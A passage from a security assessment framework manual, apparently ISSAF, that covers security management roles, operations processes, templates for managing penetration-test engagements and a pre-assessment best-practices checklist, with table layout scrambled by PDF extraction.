comprising of the following:
•
-
All hardware
-
All security infrastructure devices/components
Coordination with the Network and Application / Database Security Managers for
configuration management
•
Maintenance and management of the configuration of the components
•
Implementation of the Information Security Policies, Procedures and Minimum
Baseline Standards for configurations
•
Conduct of periodic reviews of the security configurations of the components
Page 30 of 1123
•
Appropriate application of the change management processes for management of
patches, upgrades, installation and maintenance activities pertaining to the specific
components under his control
3.3.5.3 NETWORK SECURITY MANAGER
The Network Security Manager’s role is responsible for the management of security of
specific network and telecommunication components of the IS infrastructure of the
enterprise. This would include:
•
Implementation and management of security of network and telecommunication
components comprising of the following:
-
Routers
-
Bridges / Switches
-
Network Cabling
-
ISP connectivity
-
Enterprise sites connectivity
-
Other network components as applicable
•
Maintenance and management of the configuration of the components
•
Implementation of the Information Security Policies, Procedures and Minimum
Baseline Standards for configurations
•
Conduct of periodic reviews of the security configurations of the components
•
Appropriate application of the change management processes for management of
patches, upgrades, installation and maintenance activities pertaining to the specific
components under his control
3.3.5.4 APPLICATIONS & DATABASE SECURITY MANAGER
The Application and Database Security Manager’s role is responsible for the
implementation and management of application security and logical security of both
applications and databases of the Information Systems used within the Enterprise. The
specific responsibilities would include the following:
•
Maintenance and management of the configuration of the applications and
databases
•
Implementation of the Information Security Policies, Procedures and Minimum
Baseline Standards for configurations
Page 31 of 1123
•
Conduct of periodic reviews of the configurations of the applications and databases
•
Appropriate application of the change management processes for management of
patches, upgrades, installation and maintenance activities
•
Management of user access to the applications and databases
3.3.5.5 SECURITY COMPLIANCE MANAGER
The Security Compliance Manager’s role is responsible for ensuring the compliance to
the Information Security Policies, Procedures and associated Standards, Guidelines and
MBS by all personnel of the enterprise. This is one of the most critical roles in the
Security Organization and Management process of an enterprise’s security posture. The
Security Compliance Manager’s responsibilities will include the following:
•
Performing periodic security reviews and assessments of the technology
infrastructure of the company
•
Researching and recommending best practices of Information Security management
and implementation within the Enterprise.
•
Being a proactive catalyst to identification and management of Information Security
within the enterprise
3.3.6 Information Security Co-ordination
The management of each and every business unit of the enterprise should be
responsible for assisting the CISO in implementing and maintaining Information Security
within the enterprise. The coordination efforts could include the following:
•
Identifying Information Security related roles and responsibilities across the different
departments
•
Facilitating the implementation of processes related to Information Security
•
Provide feedback on enterprise-wide security initiatives
•
Assist in the assessment of the adequacy of enterprise-wide security initiatives.
•
Participate in the review of Information Security incidents
•
Facilitate the implementation of Information Security initiatives where relevant.
•
Promote support for Information Security
3.3.7 Personnel Security
Background Checks
Page 32 of 1123
On-boarding - Employees and Contractors
Off-boarding
Security in Job Responsibilities
Security Training and Awareness
Disciplinary Process
Security Incident Identification and Reporting
3.3.8 Security of Third Party
3.3.9 Outsourcing
3.4 ENTERPRISE SECURITY AND CONTROLS ASSESSMENT
3.4.1 Physical and Environmental Security
Facilities Security
Designated Secure Areas
Equipment Security
Location of IPF
Fire
Heating, Ventilation and Air-conditioning
3.4.2 Technical Controls Assessment
3.4.2.1 TECHNICAL CONTROLS ASSESSMENT METHODOLOGY
3.4.2.2 DATABASE SECURITY
3.4.2.3 HOST SECURITY
3.4.2.4 APPLICATION SECURITY AND CONTROLS
3.4.2.5 NETWORK SECURITY
3.4.3 Secure Application Development Process
3.4.4 Security Awareness
Review of Security Awareness Program (SAP)
Page 33 of 1123
Interviews
Observation
Structured walk through
Social Engineering
3.5 REVIEW OF ENTERPRISE SECURITY OPERATIONS MANAGEMENT
The implementation of a comprehensive Information Security management framework
includes both technical and manual security processes that need to be synchronous to
each other to ensure completeness of the management of security. Operations
Management includes the management of the IT administration and service delivery
processes of the enterprise. A review of the IT operations in any security framework
assessment is essential to ensure that security operational processes that support the
information security management of the enterprise are appropriately implemented and
adhered to in order to ensure that such controls and security measure are effectively
meeting the enterprise’s information risk management objectives.
3.5.1 Capacity Management
Capacity Management relates to the process of management of the IT infrastructure
capacity to ensure continuous availability of the technology infrastructure of the
enterprise. This would typically involve the management of the capacity of hardware and
software components to ensure that there is no disruption to the activities of the
business caused by any technological capacity restrictions. Such activities would
include:
•
Review and ensure that appropriate processes exist for planning and acquiring new
systems, systems upgrades or new versions of systems considering the capacity
requirements of the enterprise
•
Assess whether capacity usage is constantly monitored in order to ensure availability
of IT services and to detect any unauthorized activities in the IT environment. This is
particularly important considering the risks of DoS attacks or similar other attacks
being executed against the enterprises infrastructure.
•
Ensure that capacity monitoring and planning considers all the components of the
technology infrastructure of the enterprise such as hardware, software and
networking.
Page 34 of 1123
3.5.2 Vulnerability Management
Vulnerability Management relates to the process of management of vulnerabilities of
various applications, databases and systems software in use within an enterprise. The
need for a structured and managed Vulnerability Management process stems from the
technology infrastructure implemented within an enterprise and security or control lapses
inherent within such software. The process of vulnerability management would involve
the identification, monitoring and patch management of vulnerabilities of the specific
technologies in use. The typical activities of the
3.5.3 Release Management
Release Management comprises of management of changes to the information
technology environment of the enterprise. This would include the management of
changes in respect of the following:
3.5.3.1 PATCH MANAGEMENT
•
Patches are obtained from authorized sources only
•
Patches are appropriately tested in a test environment prior to application to the
production environment
•
Patches are applied only on need basis and not solely due to a release by the
vendor
•
Patches are adequately monitored
3.5.3.2 CONFIGURATION MANAGEMENT
Configuration management relates to the process of management of
•
The configurations of all hardware devices/components,
•
Operating systems and application software, firmware components, physical and
logical network addresses and connecting circuit numbers of Internet connectivity
and the network architecture should be adequately documented and maintained.
3.5.3.3 CHANGE MANAGEMENT
Page 35 of 1123
3.5.4 Enterprise Incident Management
Enterprise Incident Management relates to the identification, investigation and resolution
of security incidents related to the Information Systems Infrastructure of an enterprise.
The philosophy of incident management requires that all incidents irrespective of their
criticality are logged and investigated to ensure that they do not pose a security
concern/risk to the enterprise. A review of the Enterprise Incident Management
Processes includes:
•
Ensure that the enterprise has adequate infrastructure and processes to identify and
record all systems events
•
Ensure events are logged, investigated, escalated and resolved in accordance with
the Information Security Policies of the enterprise
•
Event Logs include the following at a minimum:
-
Security Device Logs (Firewall, IDS, IPS etc)
-
Network Device Logs
-
Server Logs (Applications, Databases, OS, Email, Web server, Proxy Server,
SMTP Servers)
-
Secure Transmission and Storage of Event Logs
•
Ensure that monitoring procedures provide for appropriate escalation procedures
•
Ensure monitoring of logs on daily, weekly or monthly basis as is applicable.
•
Ensure events are appropriately classified as Security Incidents (Un-authorised
access attempts at server and client levels, IDS event logs of attempted connections)
or Operational Events (Abnormal Information Systems Events such as abnormal
termination, errors, failures, connectivity issues, etc….)
•
Ensure the process provides for taking necessary actions to prevent recurrence of
security incidents through appropriate measures
•
Security Incidents are routed to Security Incident Management Process in 6.5.4.3
•
Operational Events are routed to Operations Events Management Process in 6.5.4.4
3.5.4.1 LOGGING
Logging is one of the most important activities related to the process of monitoring
Information Systems Security within an enterprise. This would involve logging of all the
occurrence of events (whether authorized or unauthorized, normal or abnormal) within
Page 36 of 1123
the Information Systems of an enterprise. These event logs would then form the basis
for review and assessment for identification of events that result in a security implication
to the enterprise. The review of a logging must ensure that the following activities are
conducted at a minimum:
•
Review the incident management procedures of the enterprise and ensure that all
technology events are appropriately recorded in a central database either using
automated solutions such as Enterprise Management Systems or through a
helpdesk function.
•
Ensure that the incident management procedures require the central events
database to be reviewed to distinguish normal operational events or potential
security events. Such reviews should ensure normal operational events are routed
to the IT operations staff for resolution, whilst potential security events are routed to
the Chief Information Security Officer and his team for investigation and resolution.
•
Assess whether the process for incident reporting ensures that all system faults or
suspected system faults must be reported and logged.
•
Ensure Helpdesk logs are periodically reviewed to ensure that all faults reported
have been satisfactorily resolved and the Helpdesk call closed.
•
Ensure fault resolutions are reviewed to ensure that Information Security and
Controls have not been compromised in the process of implementing such
resolutions.
•
Review the audit logs have been activated on critical technology components such
as servers, applications, databases and network. Ensure that these logs produce
meaningful information that can be used in investigating security events.
3.5.4.2 MONITORING
Monitoring is the process of continuous review of the event logs of various technology
components of the enterprise. This would involve a review of the audit trails, event logs,
incident logs, helpdesk logs amongst other logs as application to the enterprise.
Depending on the implementation of the logging process (i.e. centralized or
decentralized) this activity can be performed either by one or many individuals across
the enterprise. The most significant component of the process of monitoring is the
responsibility of performance of this activity. The process would necessarily require the
involvement of the Information Security Officer and the Compliance Manager to ensure
that security incidents are identified and appropriate action is initiated to resolve them.
Page 37 of 1123
3.5.4.3 SECURITY INCIDENT MANAGEMENT
The Security Incident Management process would stem from the logging and monitoring
processes mentioned above to ensure that identified security incidents are managed in
accordance with the risks that such incidents pose to the enterprise. The process of
Security Incident Management must be performed by the Information Security Officer
(ISO) and should at a minimum involve the following:
•
Definition of Security events / incidents, this would involve the formalization of a
definitions document that identifies all events / incident types that have a security
implication and considered as critical to the enterprise
•
Allocation of responsibilities for logging of events or incidents reported. This could be
a part of the helpdesk functionality or in larger enterprises, through a security
helpdesk function that is specifically constituted for handling security events or
incidents
•
Constitution of a security response team, this comprises of a team of security
personnel who would respond to the a report of a security event or incident
•
Classification of Security events or incidents, this involves the classification of
security events in order of their impact on the organization
•
Risk Assessment and Incident Response - This is a process of security incident
management wherein the security response team assesses the risks associated with
an identified security incident to the Information Security of the enterprise.
Depending on the criticality of the risk identified, the security and controls to be
implemented are determined. In the event the incident requires further investigation,
processes such as Computer Forensics and Investigations are applied.
3.5.4.4 OPERATION EVENT MANAGEMENT
Operations Event Management relates to the process of responding to events that are
operational in nature. Such events stem from the IT infrastructure and technology being
used in the enterprise and may comprise of routine IT operations events such as
abnormal performance, terminations, poor response amongst many others.
However, it is extremely important that the operations events are also assessed for
security implications so as to ensure that any operations events that may arise from
security violations are identified and remedied in accordance with a response relative to
a security incident. Furthermore, operational event remediation may also at times
Page 38 of 1123
introduce security flaws and vulnerabilities which need to be prevented at the time of
remediation itself so as to reduce the probability of such vulnerabilities being exploited
against the security interests of the enterprise.
For evaluation of security implications if any for an operational event, the process of
operations event management must be routed to the Risk Assessment in Security
Incident Management (refer 11.1.4.3 Security Incident Management)
3.5.5 User Access Management
User Access Management relates to the process of managing user access to the
Information Systems of the enterprise. This would include the management of user
access of the following:
•
New User Creation
•
Existing User Access Modifications
•
User Access Profiles creation and modifications
•
User Access Termination
A review of the user access management process would essentially comprise of the
following:
•
Review of User Access Policies
•
Review of User Access Management roles and responsibilities
•
Review of User Access creation, modification and termination for the following:
•
-
Business Applications such as ERP
-
Enterprise Applications such as Email
-
Access to Local Area Network
Review of the process for periodic reviews of user access to ensure that transitional
processes of the organization that impact job responsibilities do not result in the
users having unauthorized access
•
Review the process and results of User Access Logs monitoring processes to ensure
that unauthorized activities have been appropriately detected and remedied
3.5.6 Certification and Accreditation
Information Systems Security is a rapidly transforming environment wherein new
vulnerabilities and risks are introduced each day resulting in the pressing need for
Page 39 of 1123
constant monitoring and assessments to ensure that security management infrastructure
of the enterprise is awake to this challenge and can respond in a manner that
appropriately addresses the technology risks that impact the enterprise.
Given the rapid advancements in technology, enterprises find it difficult to maintain
adequate technological skills or to sustain continuous education to develop the expertise
internally. As a result to maintain its information security capabilities the enterprise often
relies on external parties or dedicated internal groups for the periodic assessment of its
Information Systems Security. Such reviews would typically involve the following:
•
Internal IT Audit Review, comprising of reviews of specific areas of IT security
performed by internal resources
•
Internal Security Assessment, comprising of technology specific reviews performed
by specialist IT security personnel
•
Third party Information Security Assurance Reviews, comprising of security
assessments performed by third party contractors in areas that require advanced
technology and security specializations
Accreditation involves the process of benchmarking and reviewing the IT security
implementation within an enterprise against the ISSAF.
3.6 BUSINESS
CONTINUITY
AND
DISASTER
RECOVERY
PLANNING
ASSESSMENT
3.6.1 Risk Assessment
The risk assessment process for BC and DRP stems from the Risk Assessment
performed 3.1 Identify Pertinent (Gross) Risk). Risks considered for the purposes of BC
and DRP will include all information assets categories that have availability as a critical
attribute of that asset.
3.6.2 Threat Identification & Assessment
Identify threats that impact the availability of information assets for the purposes of
business operations.
Page 40 of 1123
3.6.3 Business Impact Analysis
3.6.4 Review of BC/DR Strategy
3.6.5 Review of BC/DR Plan
3.6.6 BC/DR Testing
3.6.7 Review of BC/DR Maintenance
3.7 REVIEW OF LEGAL AND REGULATORY COMPLIANCE
Legal and Regulatory Compliance requirements are currently the most discussed topic
amongst the management of enterprises. This stems from the introduction of the
Sarbanes Oxley compliance (also officially known as the Public Company Accounting
and Investor Protection Act established in 2002 in the United States), the Data
Protection Act (UK) and Singapore Evidence Act, Freedom of Information Act (India)
amongst many other acts.
All these acts have a significant impact on the Technology infrastructure and the
Information Systems of the enterprise, thereby necessitating an enterprise’s compliance
with technology related laws. For a long time, the legal and regulatory framework
remained obscure resulting in IS Security implementations being mostly influenced by
ethics and set of commonly used best practices.
Recent developments in the legal structure of some countries have started raising
concerns about enterprises’ IS security and have urged management to reconsider their
stand point regarding IS Security and the necessity to perform IS Security assessments
coupled with comprehensive implementations of appropriate security solutions.
Although the ISSAF do not cover the technical requirements of each and every law in
existence, the framework does acknowledge and details the need to assess that the
enterprise has taken reasonable steps or have adequate controls in place to ensure that
all its legal and regulatory requirements are identified and met.
Page 41 of 1123
3.7.1 Identify Regulatory Compliance Requirement
During an Information Security Assessment, there is a need to identify the legal and
regulatory requirements which the enterprise need to adhere to. Generally, reliance can
be placed on any control processes within the enterprise which enables the identification
of such compliance. For example, if the enterprise has a compliance department which
consists of legal advisors and has the main responsibility of identifying such
requirements, reliance can be placed upon their work by assessing the controls that
exists within the processes. Documentary evidence of work performed should be made
available regarding verification of compliance to laws.
It is however recommended that the personnel engaged with the responsibility of
performing the Information Security Assessment should also have an understanding of
the various laws that exist and affects Information Security and the Technology
infrastructure of the enterprise.
3.7.2 Review Compliance against Regulatory Requirement
While performing the Information Security Assessment, compliance to the specific legal
and regulatory requirements should be ensured. Additionally, reviewing the
documentation and reports from any independent third party with regards to legal and
regulatory compliance review can also be beneficial.
3.7.3 Certification and Accreditation
Any certification and/or accreditation which the enterprise has obtained will substantiate
the compliance of the enterprise to any legal and regulatory requirements which they
need to comply with.
3.8 RESIDUAL RISK MANAGEMENT
Based on the Risk assessment (refer sec 3.1 Identify Pertinent (Gross) Risk), we
establish the risks that the business has accepted to manage through the
implementation of information security management.
Risks not covered by the information security infrastructure of the business.
Risks that the business has agreed to accept in the light of:
•
Cost Benefit Analysis (Where the cost of control exceeds the risk impact to the
business)
Page 42 of 1123
•
Periodic Assessment of residual risk
Page 43 of 1123
4 ENGAGEMENT MANAGEMENT
A project is a grouping of activities that, when put together, achieves an objective and
goal. A project always has a recognizable beginning and end. The below topics give an
overview on how project management can be performed for security assessment
projects.
The security-testing job entails numerous tasks and involves several parties. Such a job
requires project planning from the starting point and management activity throughout the
development of the project. This section describes the project management aspects of a
security assessment project.
The following guidelines can directly used for providing project management plan to the
client.
4.1 PROJECT EXECUTIVE OVERVIEW
(Optional) The executive summary provides a summary of the project definition
document. In many cases, this is a PowerPoint presentation. If it is, then a reference to
the external document can be included here. This section contains high-level
explanation of the project objectives, scope, assumptions, risks, costs, timeline,
approach, and organization. (Remove this comment section from final document.)
Describe the background and context for the project and why it is being undertaken.
Speak to the business value of the work being performed. Put enough information here
so that the rest of the sections in the project definition make sense. (Remove this
comment section from final document.)
4.2 OBJECTIVE
Objectives are statements that describe what this project will achieve and deliver.
Objectives should be “SMART”: Specific, Measurable, Achievable, Realistic, and TimeBased. To be specific and concrete, objectives should be deliverable-based. The
completion of an objective should be evident through the creation of one or more
Page 44 of 1123
deliverables. If the statement is at a high level and does not imply the creation of a
deliverable, it may be a goal instead. If the statement is too low-level and describes
features and functions, then it may be a requirement statement instead. (Remove this
comment section from final document.)
The XXX project will meet the following objectives:
•
Objective #2
•
Objective #3
•
Objective #1
Expected Result[s]
Give a brief description of the deliverable. A sample deliverable report can also be
attached.
The XXX project will produce the following deliverables:
•
Deliverable #1
•
Deliverable #1
•
Deliverable #1
4.3 METHODOLOGY
Give an over view of the methodology used for the security assessment project. The
phases involved in typical security assessment project are:
•
Planning and Preparation
•
Assessment
•
Reporting
4.4 PROJECT SCOPE
In this section, you should clearly define the logical boundaries of your project. Scope
statements are used to define what is within the boundaries of the project and what is
outside those boundaries. Examples of areas that could be examined are data,
processes, applications, or business areas. The following types of information can be
helpful:
•
The types of deliverables that are in scope and out of scope (Business
Requirements, Current State Assessment)
Page 45 of 1123
•
The major life-cycle processes that are in scope and out of scope (analysis, design,
testing)
•
The types of data that are in scope and out of scope (financial, sales, employee)
•
The data sources (or databases) that are in scope and out of scope (Billing, General
Ledger, Payroll)
•
The organizations that are in scope and out of scope (Human Resources,
Manufacturing, vendors)
•
The major functionality that is in scope and out of scope (decision support, data
entry, management reporting)
(Remove this comment section from final document.)
The scope of this project includes and excludes the following items.
In scope:
•
Task One
•
Task Two
•
Task Three
•
Task Four
Out of scope:
•
Task Five
•
Task Six
•
Task Seven
•
Task Eight
4.5 PROJECT KICKOFF MEETING (INTERNAL)
As you win a project, Project Manager shall call a Project Kickoff Meeting. Following are
some points shall be discussed in this meet:
•
Quick look at lesson learned in previous project
o
Highlight challenges/problems and design strategy to resolve them
•
Declare Single Point of Contact for Project
•
Form Project Team and divide their tasks
•
Set deadlines on divided tasks to members responsible for Project Execution
•
Process Administrative Tasks
o
Visa Processing (If required)
Page 46 of 1123
o
Travel Management
o
Check Passport status and Important papers with candidates
o
Check Emigration Check Not Required (ECNR) on passport of candidates
•
Availability of Tools (Commercial/Freeware)
•
Efficient delivery capabilities of promised tasks in proposal
•
Any help needed for delivery
o
Infrastructure for testing
o
Training
o
Backup infrastructure
•
Inform TIM about IP Addresses
•
Project manager or assigned team member shall give minutes of meetings to
everybody
4.6 COMMUNICATIONS PLAN
Name / Project Role
Numbers
Email
INSERT CONTACT LIST
Standard/Scheduled Communications
The Assessment Team Program/Project Manager will initiate the following project
meetings through the project life cycle:
On-site at –CUSTOMER NAME-:
•
Mid-Planning and End-of-Planning Meetings
•
Project Kick-Off Meeting
Page 47 of 1123
•
Progress Meetings (frequency and method to be determined by the CUSTOMER
NAME). A meeting agenda will be distributed to attendees prior to the meeting
and meeting minutes will be distributed after the meeting.
•
Project End (Debrief) Meeting
On a weekly basis, Assessment Project Management will provide status to all project
stakeholders via the CUSTOMER NAME project web site (to be developed). All project
related, the Project Manager would post documents developed during the week each
Friday. The project web site is a valuable tool that historically archives all documents,
making them easily, and readily available for baseline reviews.
It is imperative for all managers to be aware of issues that their teams are
managing / experiencing; therefore, all project communications will follow a
“chain of command” structure. Please refer to the Project Org Chart for
communication checkpoints.
•
Explain your understanding of client’s requirement
•
Discuss dates of assessment offshore/onsite
•
Request client to issue an Invitation letter to embassy by the name of test team
members (If required)
•
Update client for source IP addresses used for assessment
4.7 PROJECT KICKOFF CALL WITH CLIENT
Points to discuss
•
Identify access points and number of devices needs to be tested
•
Deliverables
o
Executive Summary
o
Vulnerability Summary
o
Detailed Test results with countermeasure to safeguard against vulnerabilities
•
Single Point of Contact from both end
•
Team Introduction
•
Project start and end date
•
Working days/hrs
•
Internet Access during onsite assessment
Page 48 of 1123
•
Site location and contact numbers
•
Update client about source IP addresses used for testing
•
Make sure access to service is open in firewall from given source IP address to
perform assessment.
•
Make sure access to service is given from your company /ISP Router and Firewall
4.8 SAMPLE STATUS REPORT
From:
Status Report for
Subj:
Period:
If appropriate, provide background information for this report. You may wish to include
the following information in your comments:
Origins of the project; business reason for its initiation; anticipated value to the customer;
and projected increase to revenue or decrease to cost.
Project scope and objective
Summary:
Total Hours Used:
Identify overall project status and provide a few key bullet points highlighting planned vs.
actual aspects of each relevant topic:
Project Status:
GREEN
YELLOW
RED
NOTE: Status Reports will be completed weekly. Do not be hesitant to provide a
yellow or red status; this is a tool to alert management to potential issues.
•
Green – Project is proceeding on plan with no major showstoppers.
•
Yellow – Project has tasks that “may” impact project completion.
•
Red – Major issues exist with required tasks that are needed to complete the
project. Management assistance is needed immediately.
Page 49 of 1123
Project Schedule
Indicate the current planned completion date for all major tasks & milestones through
completion of the project.
TASK/EVENT
PLANNED DATE
Major Accomplishments: (Any significant completed tasks)
Highlight major accomplishments achieved during the reported status period. Identify
focus of current project work and any additional information on completed tasks.
Outstanding Issues or delinquent items
Identify appropriate critical issues that threaten the success of this project. Provide
further information regarding background and action plans for addressing the issue.
ISSUE
ACTION PLAN
Page 50 of 1123
Next Steps/Upcoming Events - (planned tasks for the next reporting period)
4.9 ISSUE ESCALATION PLAN
Escalation chart in case of issue can be provided in this section. Escalation will happen
both client and assessment organization. A flow chart will be of great help.
4.10 DEVELOP A PROJECT PLAN AND SEND IT TO CUSTOMER
It should include followings:
•
Send test cases which you are going to execute
•
Put time for every test case
•
Mention start and end date of project
•
Time of assessment
•
Contacts of each team
4.11 SET MILESTONES AND TIMELINES
Define milestones of projects as per tasks, stick to them and achieve in defined time. Try
to complete testing in office hours. It will help to minimize any down time if it occurs in
any circumstances.
Event
Week 1
Week 2
Week 3
Week 4
Planning and Prepration
Information Gathering
Network Mapping
Vulnerability Identification
Vulnerability
Identification
cont…
Vulnerability
Identification
cont…
Target Exploitation
Target Exploitation …
Page 51 of 1123
Week 5
Target Exploitation …
Reporting
4.12 PROJECT SCHEDULE
The CUSTOMER NAME Project will be driven with a Project schedule chart.. The Master
Schedule details all major phases and it’s associated sub-tasks. The Master Schedule is
detailed below.
<INSERT PROJECT SCHEDULE HERE>
4.13 DELIVERABLES PRODUCED
All projects have deliverables. In this section, describe the deliverables of the project.
Provide enough explanation and detail so that the reader will be able to understand what
is being produced. (Remove this comment section from final document.)
•
Deliverable 1: description
•
Deliverable 2: description
•
Deliverable 3: description
4.14 PROJECT ESTIMATED EFFORT/COST/DURATION (COST OPTIONAL)
The estimated effort hours and project costs may be depicted in many ways, including
cost by team member, cost by deliverable, cost by milestone, or cost by category
(internal labor, external labor, travel, training, supplies, etc.). Also include a chart
showing the project start date, major milestones, and end date. The deliverables
included in this milestone chart should all have been described in the scope section.
(Remove this comment section from final document.)
Page 52 of 1123
Milestone
Date
Deliverable(s) completed
completed
Project planning
Milestone 1
Mm/dd/yy
Mm/dd/yy
•
Project definition
•
Workplan
•
Deliverable 1
•
Deliverable 2
Milestone 2
Mm/dd/yy
•
Deliverable 3
Milestone 3
Mm/dd/yy
•
Deliverable 4
Milestone 4
Mm/dd/yy
•
Deliverable 5
Project conclusion
Mm/dd/yy
Page 53 of 1123
4.15 PROJECT ASSUMPTIONS
Project assumptions are circumstances and events that need to occur for the project to
be successful but are outside the total control of the project team. They are listed as
assumptions if there is a HIGH probability that they will in fact happen. The assumptions
provide a historical perspective when evaluating project performance and determining
justification for project-related decisions and direction. (Remove this comment section
from final document.)
In order to identify and estimate the required tasks and timing for the project, certain
assumptions and premises need to be made. Based on the current knowledge today, the
project assumptions are listed below. If an assumption is invalidated at a later date, then
the activities and estimates in the project plan should be adjusted accordingly.
•
Assumption #1
•
Assumption #2
•
Assumption #3, etc
4.16 PROJECT RISKS
Project risks are circumstances or events that exist outside of the control of the project
team that will have an adverse impact on the project if they occur. (In other words,
whereas an issue is a current problem that must be dealt with, a risk is a potential future
problem that has not yet occurred.) All projects contain some risks. It may not be
possible to eliminate risks entirely, but they can be anticipated and managed, thereby
reducing the probability that they will occur.
Risks that have a high probability of occurring and have a high negative impact should
be listed below. Also consider those risks that have a medium probability of occurring.
For each risk listed, identify activities to perform to eliminate or mitigate the risk.
Page 54 of 1123
IDENTIFICATION
QUANTIFICATION
MITIGATION
PROBABILITY (%)
DESCRIPTION
OF RISK EVENT
Low
Medium
High
0-.35
.35-.65
.65-1.0
CONSEQUENCES
SOLUTIONS
WBS
#
4.17 PROJECT APPROACH
This section is used to describe how the project will be structured and the important
techniques that will be utilized. The project approach is intended to encourage the
project manager to think about the project from the top down instead of the traditional
bottom-up method. Including the approach in the project definition compels the project
manager to both consider the dependencies of the project and to incorporate the project
management necessary to plan and manage the project. (Remove this comment section
from final document.)
4.18 PROJECT ORGANIZATION (ASSESSMENT TEAM & CLIENT)
It is important to understand who the major players are on the project. An organization
chart works well. Otherwise, list the major project roles and the actual people involved.
(Remove this comment section from final document.)
Add a project organization chart, if available. (Remove this comment section from final
document.)
Page 55 of 1123
COMMENTS
4.19 RESPONSIBILITY MATRIX
A – Approves the Deliverable
R – Responsible for Creating the Deliverable
N- Notified when deliverable is complete
M – Manages the Deliverable
F – Facilitates timely Resource Allocation
S – Responsible for Acceptance and Signoff
P – Participate in Archiving the Deliverable
S.NO
Deliverable
Assessment Team
s & Tasks
Clients
Stake
Program
Project
Consultant
Team
Project
Holders
Manager
Manager
s
Members
Manager
& Functional
A
R
R
Heads
1
Project
R
Scope
4.20 SIGN-OFF SHEET
Client Name: XXXXX
Project Manager: XXXX,
Project
IT
Name:
Assessment
Begin
Date:
04/06/03
Security
Purchase Order Number:
Target
10/09/0
Final
End Date:
3
Date:
End
Page 56 of 1123
S.NO
1
Deliverables
Statement of Work
Date
Assessment Team
Completed
Name
Xxxxxxxxxxxx
13/06/2003
Final Sign off
Assessment team has successfully performed according to the conditions set-forth in the
SOW, Dated _____for the Security Assessment Project.
Sign Off on Work Performed:
_________________
XXXXXXX
Assessment Lead
_____________________
XXXXX
Client Lead
Page 57 of 1123
5 BEST PRACTICES– PRE ASSESSMENT, ASSESSMENT
AND POST ASSESSMENT
Over the last few years, the security assessment process has evolved from an assorted
set of attacks carried out by amateurs to a mature and reviewable assessment process
with strong legal boundaries and well-defined deliverables.
Irrespective
of
Vulnerability
Assessment,
Penetration
Testing
and/or
Security
Assessment, there are certain things which the assessor needs to take care of while
assessing the strength of an enterprise’s security.
A well defined, proven and structured assessment can assist greatly in fortifying your
defenses; it also throws up newer, complex issues that you will have to deal with. E.g.
Legal Aspects, Check Knowledge base section for more detail on this.
This section provides all the best practices / guidelines required to perform the security
assessment. Management, key people involved in assessment and all other members of
the assessment team must read and follow it. Owner and Assessment Company
(irrespective of internal or external) should sign it before starting an assessment.
Compliance
Best Practices / Guidelines
Comments
(Yes/No)
Legal Aspects
Ensure that you have signed a Non-Disclosure
agreement with the company that is performing the
9
assessment.
Recommended Reading: Non Disclosure
Agreement in Knowledge Base section.
Ensure
that
you
have
signed
the
Security
Assessment Agreement.
Recommended Reading: Security Assessment
9
Agreement in the Appendix.
Ensure that you do not scan outside IP Address and
9
Page 58 of 1123
are limited to the IP addresses and domains
specifically assigned to you.
Clearly define the boundaries of the assessment to
avoid any conflict and/or confidentiality issues. E.g.
an assessor breaks into the system and he may
read confidential information on it. Make it clear
whether
you
want
the
assessor
to
9
access
confidential information and show it to you or just
leave a message on the system in a text file.
Clearly
define
the
limits
of
liability
for
the
assessment team, in case of an incident caused by
negligence or malpractice. E.g. most assessment
9
teams limit the liability up to the cost of the security
service being performed.
People
Assessment team participating in the assessment,
the following information must be documented and
evaluated by the Assessed Company:
a) Experience with the platforms, applications,
network protocols and hardware devices being
tested. Experience of candidates should match that
of the targeted infrastructure.
b) Certifications and courses related to penetration
testing.
This
assessment
information
team
should
members
are
confirm
capable
that
of
9
performing the activities described in the scope of
the service.
c) Years of experience in penetration testing
engagements. This information should confirm that
assessment
team
members
are
capable
of
performing the activities described in the scope of
the service.
d)
Attack
scripting/programming
languages
mastered by each member. This information should
Page 59 of 1123
demonstrate abilities for designing and performing
manual testing procedures.
e) Public information showing participation in the
community of each member, such as articles, forum
posts, papers, participation in events, etc. People
that show up in public places demonstrate their
credentials and is more easily trusted. Assessors
that have engaged in a public discussions on
information
security
testing
demonstrate
their
knowledge and experience.
f)
List
and
description
of
tools/scripts
created/modified by each member, related to
security
assessment.
This
information
should
demonstrate abilities for designing and performing
manual testing procedures.
g) Roles and Responsibilities of each member in the
team. This information should indicate the grade of
involvement of each assessor and the importance of
their participation in the team.
Have you gone through the resumes (including
references) of the assessment team members and
9
are you satisfied with their skills?
Have you checked recruiting policies of company
and are you comfortable with them?
9
Have the employees of the Company performing the
assessment
signed
strong
Non-disclosure
9
agreements with their firm?
Processes
Have you clearly mentioned that you want to assess
a denial of service attack on your live or test
system? Or do you prefer that they simply audit the
system and describe the specific flaws in your
9
network that leave you susceptible to a particular
Denial of Service attack?
Page 60 of 1123
Generally a security assessment / penetration test is
recommended only when you have baseline security
9
in place.
Are you assessing security of secondary systems
(may be redundant) instead of primary systems?
Both
approaches
have their
advantages
and
disadvantages but it is generally recommended that
you assess the security of secondary servers rather
than primary servers when strict confidentiality has
9
to be maintained and any kind of down time is not
acceptable. The path used to attack the secondary
servers can reveal flaws in your security architecture
that apply equally to your primary servers.
Is the test infrastructure secure and is logging
performed? Please give details.
9
Is the assessment team or a team member going to
perform any test from home? Especially using a PC
other than an official Laptop or assessment
9
machine.
Ensure that the assessment team provides precise
information on the assessment equipment physical
and logical locations (E.g. physical addresses from
9
where tests will be conducted and IP addresses
used at the time of the test).
Is the process established to get clearance before
starting a test?
Are the test cases provided to you?
9
9
Ensure that the organization/company has licenses
for the commercial tools used by the assessment
team. Make sure that both parties are clear on who
9
is going to provide what tools.
Is the date, time and day for the assessment fixed?
A time when traffic is minimal is preferred, late
9
Page 61 of 1123
nights and weekends are good times since any
unexpected negative impact on the network will
cause least harm to the users during off-peak hours.
Does the Assessment Company have well-defined
processes for managing the output of the test
9
cases?
Ensure that both the Assessment Company and the
Assessed Company exchange contact information
of people involved in the tests anytime during the
engagement.
(E.g.
email
addresses,
9
phone
numbers, fax numbers and pagers).
Deliverables
The assessment team should show a
clear
approach and path of attack to be carried out and a
demo as and when required.
A list of vulnerabilities on the compromised network
9
is not sufficient since it may not give the actual path
that can be exploited.
Has the Assessment Company submitted a sample
copy of previous Assessment reports? Does it cover
everything you want as a client?
Ensure that you do not reveal any kind of client
9
information, very clearly mask client name and
information that makes resources identifiable such
as IP addresses.
The report shall contain all tests performed and their
outputs as per the ISSAF test case template
List of vulnerabilities identified and countermeasure
to safeguard against them.
Very
high
critical
threats
must
be
9
9
reported
9
Ensure that you do not use new/unfamiliar tool on a
9
immediately.
production environment.
Page 62 of 1123
Guard against performing a man-in-the-middle
